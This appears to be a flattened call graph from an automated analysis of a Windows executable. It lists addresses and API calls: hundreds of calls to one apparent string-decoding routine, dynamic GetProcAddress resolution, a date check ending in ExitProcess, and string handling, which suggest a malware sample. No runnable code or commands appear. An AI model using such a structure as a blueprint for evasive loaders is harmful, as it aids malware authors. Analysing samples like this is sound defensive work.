46070->46073 46288 41aab0 46071->46288 46073->46071 46074 41ad34 46074->45913 46076 41abcb 46075->46076 46077 41ac1b 46076->46077 46078 41ac09 lstrcpy 46076->46078 46077->45924 46078->46077 46292 416ac0 46079->46292 46081 416c2e 46082 416c38 sscanf 46081->46082 46321 41ab10 46082->46321 46084 416c4a SystemTimeToFileTime SystemTimeToFileTime 46085 416c80 46084->46085 46086 416c6e 46084->46086 46088 415d60 46085->46088 46086->46085 46087 416c78 ExitProcess 46086->46087 46089 415d6d 46088->46089 46090 41aa50 lstrcpy 46089->46090 46091 415d7e 46090->46091 46323 41ab30 lstrlenA 46091->46323 46094 41ab30 2 API calls 46095 415db4 46094->46095 46096 41ab30 2 API calls 46095->46096 46097 415dc4 46096->46097 46327 416680 46097->46327 46100 41ab30 2 API calls 46101 415de3 46100->46101 46102 41ab30 2 API calls 46101->46102 46103 415df0 46102->46103 46104 41ab30 2 API calls 46103->46104 46105 415dfd 46104->46105 46106 41ab30 2 API calls 46105->46106 46107 415e49 46106->46107 46336 4026f0 46107->46336 46115 415f13 46116 416680 lstrcpy 46115->46116 46117 415f25 46116->46117 46118 41aab0 lstrcpy 46117->46118 46119 415f42 46118->46119 46120 41acc0 4 API calls 46119->46120 46121 415f5a 46120->46121 46122 41abb0 lstrcpy 46121->46122 46123 415f66 46122->46123 46124 41acc0 4 API calls 46123->46124 46125 415f8a 46124->46125 46126 41abb0 lstrcpy 46125->46126 46127 415f96 46126->46127 46128 41acc0 4 API calls 46127->46128 46129 415fba 46128->46129 46130 41abb0 lstrcpy 46129->46130 46131 415fc6 46130->46131 46132 41aa50 lstrcpy 46131->46132 46133 415fee 46132->46133 47062 417690 GetWindowsDirectoryA 46133->47062 46136 41aab0 lstrcpy 46137 416008 46136->46137 47072 4048d0 46137->47072 46139 41600e 47218 4119f0 46139->47218 46141 416016 46142 41aa50 lstrcpy 46141->46142 46143 416039 46142->46143 46144 401590 lstrcpy 46143->46144 46145 41604d 46144->46145 47238 4059b0 39 API calls codecvt 46145->47238 46147 416053 47239 411280 strtok_s strtok_s lstrlenA lstrcpy 46147->47239 46149 41605e 46150 41aa50 lstrcpy 46149->46150 46151 416082 46150->46151 46152 401590 lstrcpy 46151->46152 46153 416096 46152->46153 47240 4059b0 39 API calls codecvt 46153->47240 46155 41609c 47241 410fc0 7 API calls 46155->47241 46157 4160a7 46158 41aa50 lstrcpy 46157->46158 46159 4160c9 46158->46159 46160 401590 lstrcpy 46159->46160 46161 4160dd 46160->46161 47242 4059b0 39 API calls codecvt 46161->47242 46163 4160e3 47243 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 46163->47243 46165 4160ee 46166 401590 lstrcpy 46165->46166 46167 416105 46166->46167 47244 411c60 121 API calls 46167->47244 46169 41610a 46170 41aa50 lstrcpy 46169->46170 46171 416126 46170->46171 47245 405000 8 API calls 46171->47245 46173 41612b 46174 401590 lstrcpy 46173->46174 46175 4161ab 46174->46175 47246 4108a0 338 API calls 46175->47246 46177 4161b0 46178 41aa50 lstrcpy 46177->46178 46179 4161d6 46178->46179 46180 401590 lstrcpy 46179->46180 46181 4161ea 46180->46181 47247 4059b0 39 API calls codecvt 46181->47247 46183 4161f0 47248 4113c0 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 46183->47248 46185 4161fb 46186 401590 lstrcpy 46185->46186 46187 41623b 46186->46187 47249 401ec0 67 API calls 46187->47249 46189 416240 46190 416250 46189->46190 46191 4162e2 46189->46191 46192 41aa50 lstrcpy 46190->46192 46193 41aab0 lstrcpy 46191->46193 46195 416270 46192->46195 46194 4162f5 46193->46194 46196 401590 lstrcpy 46194->46196 46197 401590 lstrcpy 46195->46197 46198 416309 46196->46198 46199 416284 46197->46199 47253 4059b0 39 API calls codecvt 46198->47253 47250 4059b0 39 API calls codecvt 46199->47250 46202 41630f 47254 4137b0 36 API calls 46202->47254 46203 41628a 47251 411520 21 API calls codecvt 46203->47251 46206 4162da 46209 41635b 46206->46209 46212 401590 lstrcpy 46206->46212 46207 416295 46208 401590 lstrcpy 46207->46208 46210 4162d5 46208->46210 46211 416380 46209->46211 46214 401590 lstrcpy 46209->46214 47252 414010 75 API calls 46210->47252 46215 4163a5 46211->46215 46218 401590 lstrcpy 46211->46218 46216 416337 46212->46216 46217 41637b 46214->46217 46220 4163ca 46215->46220 46225 401590 lstrcpy 46215->46225 47255 414300 64 API calls codecvt 46216->47255 47257 4149d0 101 API calls codecvt 46217->47257 46223 4163a0 46218->46223 46221 4163ef 46220->46221 46227 401590 lstrcpy 46220->46227 46228 416414 46221->46228 46234 401590 lstrcpy 46221->46234 47258 414e00 67 API calls codecvt 46223->47258 46224 41633c 46230 401590 lstrcpy 46224->46230 46226 4163c5 46225->46226 47259 414fc0 75 API calls 46226->47259 46233 4163ea 46227->46233 46231 416439 46228->46231 46236 401590 lstrcpy 46228->46236 46235 416356 46230->46235 46237 416460 46231->46237 46242 401590 lstrcpy 46231->46242 47260 415190 69 API calls codecvt 46233->47260 46239 41640f 46234->46239 47256 415350 71 API calls 46235->47256 46241 416434 46236->46241 46243 416470 46237->46243 46244 416503 46237->46244 47261 407770 125 API calls codecvt 46239->47261 47262 4152a0 67 API calls codecvt 46241->47262 46247 416459 46242->46247 46249 41aa50 lstrcpy 46243->46249 46248 41aab0 lstrcpy 46244->46248 47263 4191a0 54 API calls codecvt 46247->47263 46251 416516 46248->46251 46252 416491 46249->46252 46253 401590 lstrcpy 46251->46253 46254 401590 lstrcpy 46252->46254 46256 41652a 46253->46256 46255 4164a5 46254->46255 47264 4059b0 39 API calls codecvt 46255->47264 47267 4059b0 39 API calls codecvt 46256->47267 46259 4164ab 47265 411520 21 API calls codecvt 46259->47265 46260 416530 47268 4137b0 36 API calls 46260->47268 46263 4164fb 46266 41aab0 lstrcpy 46263->46266 46264 4164b6 46265 401590 lstrcpy 46264->46265 46267 4164f6 46265->46267 46268 41654c 46266->46268 47266 414010 75 API calls 46267->47266 46270 401590 lstrcpy 46268->46270 46271 416560 46270->46271 47269 4059b0 39 API calls codecvt 46271->47269 46273 41656c 46275 416588 46273->46275 47270 4168d0 9 API calls codecvt 46273->47270 46275->45932 46277 4046e7 46276->46277 46278 4046fc 11 API calls 46277->46278 46279 40479f 6 API calls 46277->46279 46278->46277 46279->45936 46280->46023 46282 4010c2 codecvt 46281->46282 46283 4010fd 46282->46283 46284 4010e2 VirtualFree 46282->46284 46283->46053 46284->46283 46286 401233 GlobalMemoryStatusEx 46285->46286 46286->46056 46287->46069 46289 41aad2 46288->46289 46290 41aafc 46289->46290 46291 41aaea lstrcpy 46289->46291 46290->46074 46291->46290 46293 41aa50 lstrcpy 46292->46293 46294 416ad3 46293->46294 46295 41acc0 4 API calls 46294->46295 46296 416ae5 46295->46296 46297 41abb0 lstrcpy 46296->46297 46298 416aee 46297->46298 46299 41acc0 4 API calls 46298->46299 46300 416b07 46299->46300 46301 41abb0 lstrcpy 46300->46301 46302 416b10 46301->46302 46303 41acc0 4 API calls 46302->46303 46304 416b2a 46303->46304 46305 41abb0 lstrcpy 46304->46305 46306 416b33 46305->46306 46307 41acc0 4 API calls 46306->46307 46308 416b4c 46307->46308 46309 41abb0 lstrcpy 46308->46309 46310 416b55 46309->46310 46311 41acc0 4 API calls 46310->46311 46312 416b6f 46311->46312 46313 41abb0 lstrcpy 46312->46313 46314 416b78 46313->46314 46315 41acc0 4 API calls 46314->46315 46316 416b93 46315->46316 46317 41abb0 lstrcpy 46316->46317 46318 416b9c 46317->46318 46319 41aab0 lstrcpy 46318->46319 46320 416bb0 46319->46320 46320->46081 46322 41ab22 46321->46322 46322->46084 46324 41ab4f 46323->46324 46325 415da4 46324->46325 46326 41ab8b lstrcpy 46324->46326 46325->46094 46326->46325 46328 41abb0 lstrcpy 46327->46328 46329 416693 46328->46329 46330 41abb0 lstrcpy 46329->46330 46331 4166a5 46330->46331 46332 41abb0 lstrcpy 46331->46332 46333 4166b7 46332->46333 46334 41abb0 lstrcpy 46333->46334 46335 415dd6 46334->46335 46335->46100 46337 404610 34 API calls 46336->46337 46338 402704 46337->46338 46339 404610 34 API calls 46338->46339 46340 402727 46339->46340 46341 404610 34 API calls 46340->46341 46342 402740 46341->46342 46343 404610 34 API calls 46342->46343 46344 402759 46343->46344 46345 404610 34 API calls 46344->46345 46346 402786 46345->46346 46347 404610 34 API calls 46346->46347 46348 40279f 46347->46348 46349 404610 34 API calls 46348->46349 46350 4027b8 46349->46350 46351 404610 34 API calls 46350->46351 46352 4027e5 46351->46352 46353 404610 34 API calls 46352->46353 46354 4027fe 46353->46354 46355 404610 34 API calls 46354->46355 46356 402817 46355->46356 46357 404610 34 API calls 46356->46357 46358 402830 46357->46358 46359 404610 34 API calls 46358->46359 46360 402849 46359->46360 46361 404610 34 API calls 46360->46361 46362 402862 46361->46362 46363 404610 34 API calls 46362->46363 46364 40287b 46363->46364 46365 404610 34 API calls 46364->46365 46366 402894 46365->46366 46367 404610 34 API calls 46366->46367 46368 4028ad 46367->46368 46369 404610 34 API calls 46368->46369 46370 4028c6 46369->46370 46371 404610 34 API calls 46370->46371 46372 4028df 46371->46372 46373 404610 34 API calls 46372->46373 46374 4028f8 46373->46374 46375 404610 34 API calls 46374->46375 46376 402911 46375->46376 46377 404610 34 API calls 46376->46377 46378 40292a 46377->46378 46379 404610 34 API calls 46378->46379 46380 402943 46379->46380 46381 404610 34 API calls 46380->46381 46382 40295c 46381->46382 46383 404610 34 API calls 46382->46383 46384 402975 46383->46384 46385 404610 34 API calls 46384->46385 46386 40298e 46385->46386 46387 404610 34 API calls 46386->46387 46388 4029a7 46387->46388 46389 404610 34 API calls 46388->46389 46390 4029c0 46389->46390 46391 404610 34 API calls 46390->46391 46392 4029d9 46391->46392 46393 404610 34 API calls 46392->46393 46394 4029f2 46393->46394 46395 404610 34 API calls 46394->46395 46396 402a0b 46395->46396 46397 404610 34 API calls 46396->46397 46398 402a24 46397->46398 46399 404610 34 API calls 46398->46399 46400 402a3d 46399->46400 46401 404610 34 API calls 46400->46401 46402 402a56 46401->46402 46403 404610 34 API calls 46402->46403 46404 402a6f 46403->46404 46405 404610 34 API calls 46404->46405 46406 402a88 46405->46406 46407 404610 34 API calls 46406->46407 46408 402aa1 46407->46408 46409 404610 34 API calls 46408->46409 46410 402aba 46409->46410 46411 404610 34 API calls 46410->46411 46412 402ad3 46411->46412 46413 404610 34 API calls 46412->46413 46414 402aec 46413->46414 46415 404610 34 API calls 46414->46415 46416 402b05 46415->46416 46417 404610 34 API calls 46416->46417 46418 402b1e 46417->46418 46419 404610 34 API calls 46418->46419 46420 402b37 46419->46420 46421 404610 34 API calls 46420->46421 46422 402b50 46421->46422 46423 404610 34 API calls 46422->46423 46424 402b69 46423->46424 46425 404610 34 API calls 46424->46425 46426 402b82 46425->46426 46427 404610 34 API calls 46426->46427 46428 402b9b 46427->46428 46429 404610 34 API calls 46428->46429 46430 402bb4 46429->46430 46431 404610 34 API calls 46430->46431 46432 402bcd 46431->46432 46433 404610 34 API calls 46432->46433 46434 402be6 46433->46434 46435 404610 34 API calls 46434->46435 46436 402bff 46435->46436 46437 404610 34 API calls 46436->46437 46438 402c18 46437->46438 46439 404610 34 API calls 46438->46439 46440 402c31 46439->46440 46441 404610 34 API calls 46440->46441 46442 402c4a 46441->46442 46443 404610 34 API calls 46442->46443 46444 402c63 46443->46444 46445 404610 34 API calls 46444->46445 46446 402c7c 46445->46446 46447 404610 34 API calls 46446->46447 46448 402c95 46447->46448 46449 404610 34 API calls 46448->46449 46450 402cae 46449->46450 46451 404610 34 API calls 46450->46451 46452 402cc7 46451->46452 46453 404610 34 API calls 46452->46453 46454 402ce0 46453->46454 46455 404610 34 API calls 46454->46455 46456 402cf9 46455->46456 46457 404610 34 API calls 46456->46457 46458 402d12 46457->46458 46459 404610 34 API calls 46458->46459 46460 402d2b 46459->46460 46461 404610 34 API calls 46460->46461 46462 402d44 46461->46462 46463 404610 34 API calls 46462->46463 46464 402d5d 46463->46464 46465 404610 34 API calls 46464->46465 46466 402d76 46465->46466 46467 404610 34 API calls 46466->46467 46468 402d8f 46467->46468 46469 404610 34 API calls 46468->46469 46470 402da8 46469->46470 46471 404610 34 API calls 46470->46471 46472 402dc1 46471->46472 46473 404610 34 API calls 46472->46473 46474 402dda 46473->46474 46475 404610 34 API calls 46474->46475 46476 402df3 46475->46476 46477 404610 34 API calls 46476->46477 46478 402e0c 46477->46478 46479 404610 34 API calls 46478->46479 46480 402e25 46479->46480 46481 404610 34 API calls 46480->46481 46482 402e3e 46481->46482 46483 404610 34 API calls 46482->46483 46484 402e57 46483->46484 46485 404610 34 API calls 46484->46485 46486 402e70 46485->46486 46487 404610 34 API calls 46486->46487 46488 402e89 46487->46488 46489 404610 34 API calls 46488->46489 46490 402ea2 46489->46490 46491 404610 34 API calls 46490->46491 46492 402ebb 46491->46492 46493 404610 34 API calls 46492->46493 46494 402ed4 46493->46494 46495 404610 34 API calls 46494->46495 46496 402eed 46495->46496 46497 404610 34 API calls 46496->46497 46498 402f06 46497->46498 46499 404610 34 API calls 46498->46499 46500 402f1f 46499->46500 46501 404610 34 API calls 46500->46501 46502 402f38 46501->46502 46503 404610 34 API calls 46502->46503 46504 402f51 46503->46504 46505 404610 34 API calls 46504->46505 46506 402f6a 46505->46506 46507 404610 34 API calls 46506->46507 46508 402f83 46507->46508 46509 404610 34 API calls 46508->46509 46510 402f9c 46509->46510 46511 404610 34 API calls 46510->46511 46512 402fb5 46511->46512 46513 404610 34 API calls 46512->46513 46514 402fce 46513->46514 46515 404610 34 API calls 46514->46515 46516 402fe7 46515->46516 46517 404610 34 API calls 46516->46517 46518 403000 46517->46518 46519 404610 34 API calls 46518->46519 46520 403019 46519->46520 46521 404610 34 API calls 46520->46521 46522 403032 46521->46522 46523 404610 34 API calls 46522->46523 46524 40304b 46523->46524 46525 404610 34 API calls 46524->46525 46526 403064 46525->46526 46527 404610 34 API calls 46526->46527 46528 40307d 46527->46528 46529 404610 34 API calls 46528->46529 46530 403096 46529->46530 46531 404610 34 API calls 46530->46531 46532 4030af 46531->46532 46533 404610 34 API calls 46532->46533 46534 4030c8 46533->46534 46535 404610 34 API calls 46534->46535 46536 4030e1 46535->46536 46537 404610 34 API calls 46536->46537 46538 4030fa 46537->46538 46539 404610 34 API calls 46538->46539 46540 403113 46539->46540 46541 404610 34 API calls 46540->46541 46542 40312c 46541->46542 46543 404610 34 API calls 46542->46543 46544 403145 46543->46544 46545 404610 34 API calls 46544->46545 46546 40315e 46545->46546 46547 404610 34 API calls 46546->46547 46548 403177 46547->46548 46549 404610 34 API calls 46548->46549 46550 403190 46549->46550 46551 404610 34 API calls 46550->46551 46552 4031a9 46551->46552 46553 404610 34 API calls 46552->46553 46554 4031c2 46553->46554 46555 404610 34 API calls 46554->46555 46556 4031db 46555->46556 46557 404610 34 API calls 46556->46557 46558 4031f4 46557->46558 46559 404610 34 API calls 46558->46559 46560 40320d 46559->46560 46561 404610 34 API calls 46560->46561 46562 403226 46561->46562 46563 404610 34 API calls 46562->46563 46564 40323f 46563->46564 46565 404610 34 API calls 46564->46565 46566 403258 46565->46566 46567 404610 34 API calls 46566->46567 46568 403271 46567->46568 46569 404610 34 API calls 46568->46569 46570 40328a 46569->46570 46571 404610 34 API calls 46570->46571 46572 4032a3 46571->46572 46573 404610 34 API calls 46572->46573 46574 4032bc 46573->46574 46575 404610 34 API calls 46574->46575 46576 4032d5 46575->46576 46577 404610 34 API calls 46576->46577 46578 4032ee 46577->46578 46579 404610 34 API calls 46578->46579 46580 403307 46579->46580 46581 404610 34 API calls 46580->46581 46582 403320 46581->46582 46583 404610 34 API calls 46582->46583 46584 403339 46583->46584 46585 404610 34 API calls 46584->46585 46586 403352 46585->46586 46587 404610 34 API calls 46586->46587 46588 40336b 46587->46588 46589 404610 34 API calls 46588->46589 46590 403384 46589->46590 46591 404610 34 API calls 46590->46591 46592 40339d 46591->46592 46593 404610 34 API calls 46592->46593 46594 4033b6 46593->46594 46595 404610 34 API calls 46594->46595 46596 4033cf 46595->46596 46597 404610 34 API calls 46596->46597 46598 4033e8 46597->46598 46599 404610 34 API calls 46598->46599 46600 403401 46599->46600 46601 404610 34 API calls 46600->46601 46602 40341a 46601->46602 46603 404610 34 API calls 46602->46603 46604 403433 46603->46604 46605 404610 34 API calls 46604->46605 46606 40344c 46605->46606 46607 404610 34 API calls 46606->46607 46608 403465 46607->46608 46609 404610 34 API calls 46608->46609 46610 40347e 46609->46610 46611 404610 34 API calls 46610->46611 46612 403497 46611->46612 46613 404610 34 API calls 46612->46613 46614 4034b0 46613->46614 46615 404610 34 API calls 46614->46615 46616 4034c9 46615->46616 46617 404610 34 API calls 46616->46617 46618 4034e2 46617->46618 46619 404610 34 API calls 46618->46619 46620 4034fb 46619->46620 46621 404610 34 API calls 46620->46621 46622 403514 46621->46622 46623 404610 34 API calls 46622->46623 46624 40352d 46623->46624 46625 404610 34 API calls 46624->46625 46626 403546 46625->46626 46627 404610 34 API calls 46626->46627 46628 40355f 46627->46628 46629 404610 34 API calls 46628->46629 46630 403578 46629->46630 46631 404610 34 API calls 46630->46631 46632 403591 46631->46632 46633 404610 34 API calls 46632->46633 46634 4035aa 46633->46634 46635 404610 34 API calls 46634->46635 46636 4035c3 46635->46636 46637 404610 34 API calls 46636->46637 46638 4035dc 46637->46638 46639 404610 34 API calls 46638->46639 46640 4035f5 46639->46640 46641 404610 34 API calls 46640->46641 46642 40360e 46641->46642 46643 404610 34 API calls 46642->46643 46644 403627 46643->46644 46645 404610 34 API calls 46644->46645 46646 403640 46645->46646 46647 404610 34 API calls 46646->46647 46648 403659 46647->46648 46649 404610 34 API calls 46648->46649 46650 403672 46649->46650 46651 404610 34 API calls 46650->46651 46652 40368b 46651->46652 46653 404610 34 API calls 46652->46653 46654 4036a4 46653->46654 46655 404610 34 API calls 46654->46655 46656 4036bd 46655->46656 46657 404610 34 API calls 46656->46657 46658 4036d6 46657->46658 46659 404610 34 API calls 46658->46659 46660 4036ef 46659->46660 46661 404610 34 API calls 46660->46661 46662 403708 46661->46662 46663 404610 34 API calls 46662->46663 46664 403721 46663->46664 46665 404610 34 API calls 46664->46665 46666 40373a 46665->46666 46667 404610 34 API calls 46666->46667 46668 403753 46667->46668 46669 404610 34 API calls 46668->46669 46670 40376c 46669->46670 46671 404610 34 API calls 46670->46671 46672 403785 46671->46672 46673 404610 34 API calls 46672->46673 46674 40379e 46673->46674 46675 404610 34 API calls 46674->46675 46676 4037b7 46675->46676 46677 404610 34 API calls 46676->46677 46678 4037d0 46677->46678 46679 404610 34 API calls 46678->46679 46680 4037e9 46679->46680 46681 404610 34 API calls 46680->46681 46682 403802 46681->46682 46683 404610 34 API calls 46682->46683 46684 40381b 46683->46684 46685 404610 34 API calls 46684->46685 46686 403834 46685->46686 46687 404610 34 API calls 46686->46687 46688 40384d 46687->46688 46689 404610 34 API calls 46688->46689 46690 403866 46689->46690 46691 404610 34 API calls 46690->46691 46692 40387f 46691->46692 46693 404610 34 API calls 46692->46693 46694 403898 46693->46694 46695 404610 34 API calls 46694->46695 46696 4038b1 46695->46696 46697 404610 34 API calls 46696->46697 46698 4038ca 46697->46698 46699 404610 34 API calls 46698->46699 46700 4038e3 46699->46700 46701 404610 34 API calls 46700->46701 46702 4038fc 46701->46702 46703 404610 34 API calls 46702->46703 46704 403915 46703->46704 46705 404610 34 API calls 46704->46705 46706 40392e 46705->46706 46707 404610 34 API calls 46706->46707 46708 403947 46707->46708 46709 404610 34 API calls 46708->46709 46710 403960 46709->46710 46711 404610 34 API calls 46710->46711 46712 403979 46711->46712 46713 404610 34 API calls 46712->46713 46714 403992 46713->46714 46715 404610 34 API calls 46714->46715 46716 4039ab 46715->46716 46717 404610 34 API calls 46716->46717 46718 4039c4 46717->46718 46719 404610 34 API calls 46718->46719 46720 4039dd 46719->46720 46721 404610 34 API calls 46720->46721 46722 4039f6 46721->46722 46723 404610 34 API calls 46722->46723 46724 403a0f 46723->46724 46725 404610 34 API calls 46724->46725 46726 403a28 46725->46726 46727 404610 34 API calls 46726->46727 46728 403a41 46727->46728 46729 404610 34 API calls 46728->46729 46730 403a5a 46729->46730 46731 404610 34 API calls 46730->46731 46732 403a73 46731->46732 46733 404610 34 API calls 46732->46733 46734 403a8c 46733->46734 46735 404610 34 API calls 46734->46735 46736 403aa5 46735->46736 46737 404610 34 API calls 46736->46737 46738 403abe 46737->46738 46739 404610 34 API calls 46738->46739 46740 403ad7 46739->46740 46741 404610 34 API calls 46740->46741 46742 403af0 46741->46742 46743 404610 34 API calls 46742->46743 46744 403b09 46743->46744 46745 404610 34 API calls 46744->46745 46746 403b22 46745->46746 46747 404610 34 API calls 46746->46747 46748 403b3b 46747->46748 46749 404610 34 API calls 46748->46749 46750 403b54 46749->46750 46751 404610 34 API calls 46750->46751 46752 403b6d 46751->46752 46753 404610 34 API calls 46752->46753 46754 403b86 46753->46754 46755 404610 34 API calls 46754->46755 46756 403b9f 46755->46756 46757 404610 34 API calls 46756->46757 46758 403bb8 46757->46758 46759 404610 34 API calls 46758->46759 46760 403bd1 46759->46760 46761 404610 34 API calls 46760->46761 46762 403bea 46761->46762 46763 404610 34 API calls 46762->46763 46764 403c03 46763->46764 46765 404610 34 API calls 46764->46765 46766 403c1c 46765->46766 46767 404610 34 API calls 46766->46767 46768 403c35 46767->46768 46769 404610 34 API calls 46768->46769 46770 403c4e 46769->46770 46771 404610 34 API calls 46770->46771 46772 403c67 46771->46772 46773 404610 34 API calls 46772->46773 46774 403c80 46773->46774 46775 404610 34 API calls 46774->46775 46776 403c99 46775->46776 46777 404610 34 API calls 46776->46777 46778 403cb2 46777->46778 46779 404610 34 API calls 46778->46779 46780 403ccb 46779->46780 46781 404610 34 API calls 46780->46781 46782 403ce4 46781->46782 46783 404610 34 API calls 46782->46783 46784 403cfd 46783->46784 46785 404610 34 API calls 46784->46785 46786 403d16 46785->46786 46787 404610 34 API calls 46786->46787 46788 403d2f 46787->46788 46789 404610 34 API calls 46788->46789 46790 403d48 46789->46790 46791 404610 34 API calls 46790->46791 46792 403d61 46791->46792 46793 404610 34 API calls 46792->46793 46794 403d7a 46793->46794 46795 404610 34 API calls 46794->46795 46796 403d93 46795->46796 46797 404610 34 API calls 46796->46797 46798 403dac 46797->46798 46799 404610 34 API calls 46798->46799 46800 403dc5 46799->46800 46801 404610 34 API calls 46800->46801 46802 403dde 46801->46802 46803 404610 34 API calls 46802->46803 46804 403df7 46803->46804 46805 404610 34 API calls 46804->46805 46806 403e10 46805->46806 46807 404610 34 API calls 46806->46807 46808 403e29 46807->46808 46809 404610 34 API calls 46808->46809 46810 403e42 46809->46810 46811 404610 34 API calls 46810->46811 46812 403e5b 46811->46812 46813 404610 34 API calls 46812->46813 46814 403e74 46813->46814 46815 404610 34 API calls 46814->46815 46816 403e8d 46815->46816 46817 404610 34 API calls 46816->46817 46818 403ea6 46817->46818 46819 404610 34 API calls 46818->46819 46820 403ebf 46819->46820 46821 404610 34 API calls 46820->46821 46822 403ed8 46821->46822 46823 404610 34 API calls 46822->46823 46824 403ef1 46823->46824 46825 404610 34 API calls 46824->46825 46826 403f0a 46825->46826 46827 404610 34 API calls 46826->46827 46828 403f23 46827->46828 46829 404610 34 API calls 46828->46829 46830 403f3c 46829->46830 46831 404610 34 API calls 46830->46831 46832 403f55 46831->46832 46833 404610 34 API calls 46832->46833 46834 403f6e 46833->46834 46835 404610 34 API calls 46834->46835 46836 403f87 46835->46836 46837 404610 34 API calls 46836->46837 46838 403fa0 46837->46838 46839 404610 34 API calls 46838->46839 46840 403fb9 46839->46840 46841 404610 34 API calls 46840->46841 46842 403fd2 46841->46842 46843 404610 34 API calls 46842->46843 46844 403feb 46843->46844 46845 404610 34 API calls 46844->46845 46846 404004 46845->46846 46847 404610 34 API calls 46846->46847 46848 40401d 46847->46848 46849 404610 34 API calls 46848->46849 46850 404036 46849->46850 46851 404610 34 API calls 46850->46851 46852 40404f 46851->46852 46853 404610 34 API calls 46852->46853 46854 404068 46853->46854 46855 404610 34 API calls 46854->46855 46856 404081 46855->46856 46857 404610 34 API calls 46856->46857 46858 40409a 46857->46858 46859 404610 34 API calls 46858->46859 46860 4040b3 46859->46860 46861 404610 34 API calls 46860->46861 46862 4040cc 46861->46862 46863 404610 34 API calls 46862->46863 46864 4040e5 46863->46864 46865 404610 34 API calls 46864->46865 46866 4040fe 46865->46866 46867 404610 34 API calls 46866->46867 46868 404117 46867->46868 46869 404610 34 API calls 46868->46869 46870 404130 46869->46870 46871 404610 34 API calls 46870->46871 46872 404149 46871->46872 46873 404610 34 API calls 46872->46873 46874 404162 46873->46874 46875 404610 34 API calls 46874->46875 46876 40417b 46875->46876 46877 404610 34 API calls 46876->46877 46878 404194 46877->46878 46879 404610 34 API calls 46878->46879 46880 4041ad 46879->46880 46881 404610 34 API calls 46880->46881 46882 4041c6 46881->46882 46883 404610 34 API calls 46882->46883 46884 4041df 46883->46884 46885 404610 34 API calls 46884->46885 46886 4041f8 46885->46886 46887 404610 34 API calls 46886->46887 46888 404211 46887->46888 46889 404610 34 API calls 46888->46889 46890 40422a 46889->46890 46891 404610 34 API calls 46890->46891 46892 404243 46891->46892 46893 404610 34 API calls 46892->46893 46894 40425c 46893->46894 46895 404610 34 API calls 46894->46895 46896 404275 46895->46896 46897 404610 34 API calls 46896->46897 46898 40428e 46897->46898 46899 404610 34 API calls 46898->46899 46900 4042a7 46899->46900 46901 404610 34 API calls 46900->46901 46902 4042c0 46901->46902 46903 404610 34 API calls 46902->46903 46904 4042d9 46903->46904 46905 404610 34 API calls 46904->46905 46906 4042f2 46905->46906 46907 404610 34 API calls 46906->46907 46908 40430b 46907->46908 46909 404610 34 API calls 46908->46909 46910 404324 46909->46910 46911 404610 34 API calls 46910->46911 46912 40433d 46911->46912 46913 404610 34 API calls 46912->46913 46914 404356 46913->46914 46915 404610 34 API calls 46914->46915 46916 40436f 46915->46916 46917 404610 34 API calls 46916->46917 46918 404388 46917->46918 46919 404610 34 API calls 46918->46919 46920 4043a1 46919->46920 46921 404610 34 API calls 46920->46921 46922 4043ba 46921->46922 46923 404610 34 API calls 46922->46923 46924 4043d3 46923->46924 46925 404610 34 API calls 46924->46925 46926 4043ec 46925->46926 46927 404610 34 API calls 46926->46927 46928 404405 46927->46928 46929 404610 34 API calls 46928->46929 46930 40441e 46929->46930 46931 404610 34 API calls 46930->46931 46932 404437 46931->46932 46933 404610 34 API calls 46932->46933 46934 404450 46933->46934 46935 404610 34 API calls 46934->46935 46936 404469 46935->46936 46937 404610 34 API calls 46936->46937 46938 404482 46937->46938 46939 404610 34 API calls 46938->46939 46940 40449b 46939->46940 46941 404610 34 API calls 46940->46941 46942 4044b4 46941->46942 46943 404610 34 API calls 46942->46943 46944 4044cd 46943->46944 46945 404610 34 API calls 46944->46945 46946 4044e6 46945->46946 46947 404610 34 API calls 46946->46947 46948 4044ff 46947->46948 46949 404610 34 API calls 46948->46949 46950 404518 46949->46950 46951 404610 34 API calls 46950->46951 46952 404531 46951->46952 46953 404610 34 API calls 46952->46953 46954 40454a 46953->46954 46955 404610 34 API calls 46954->46955 46956 404563 46955->46956 46957 404610 34 API calls 46956->46957 46958 40457c 46957->46958 46959 404610 34 API calls 46958->46959 46960 404595 46959->46960 46961 404610 34 API calls 46960->46961 46962 4045ae 46961->46962 46963 404610 34 API calls 46962->46963 46964 4045c7 46963->46964 46965 404610 34 API calls 46964->46965 46966 4045e0 46965->46966 46967 404610 34 API calls 46966->46967 46968 4045f9 46967->46968 46969 419f20 46968->46969 46970 419f30 43 API calls 46969->46970 46971 41a346 8 API calls 46969->46971 46970->46971 46972 41a456 46971->46972 46973 41a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46971->46973 46974 41a463 8 API calls 46972->46974 46975 41a526 46972->46975 46973->46972 46974->46975 46976 41a5a8 46975->46976 46977 41a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46975->46977 46978 41a5b5 6 API calls 46976->46978 46979 41a647 46976->46979 46977->46976 46978->46979 46980 41a654 9 API calls 46979->46980 46981 41a72f 46979->46981 46980->46981 46982 41a7b2 46981->46982 46983 41a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46981->46983 46984 41a7bb GetProcAddress GetProcAddress 46982->46984 46985 41a7ec 46982->46985 46983->46982 46984->46985 46986 41a825 46985->46986 46987 41a7f5 GetProcAddress GetProcAddress 46985->46987 46988 41a922 46986->46988 46989 41a832 10 API calls 46986->46989 46987->46986 46990 41a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46988->46990 46991 41a98d 46988->46991 46989->46988 46990->46991 46992 41a996 GetProcAddress 46991->46992 46993 41a9ae 46991->46993 46992->46993 46994 41a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46993->46994 46995 415ef3 46993->46995 46994->46995 46996 401590 46995->46996 47271 4016b0 46996->47271 46999 41aab0 lstrcpy 47000 4015b5 46999->47000 47001 41aab0 lstrcpy 47000->47001 47002 4015c7 47001->47002 47003 41aab0 lstrcpy 47002->47003 47004 4015d9 47003->47004 47005 41aab0 lstrcpy 47004->47005 47006 401663 47005->47006 47007 415760 47006->47007 47008 415771 47007->47008 47009 41ab30 2 API calls 47008->47009 47010 41577e 47009->47010 47011 41ab30 2 API calls 47010->47011 47012 41578b 47011->47012 47013 41ab30 2 API calls 47012->47013 47014 415798 47013->47014 47015 41aa50 lstrcpy 47014->47015 47016 4157a5 47015->47016 47017 41aa50 lstrcpy 47016->47017 47018 4157b2 47017->47018 47019 41aa50 lstrcpy 47018->47019 47020 4157bf 47019->47020 47021 41aa50 lstrcpy 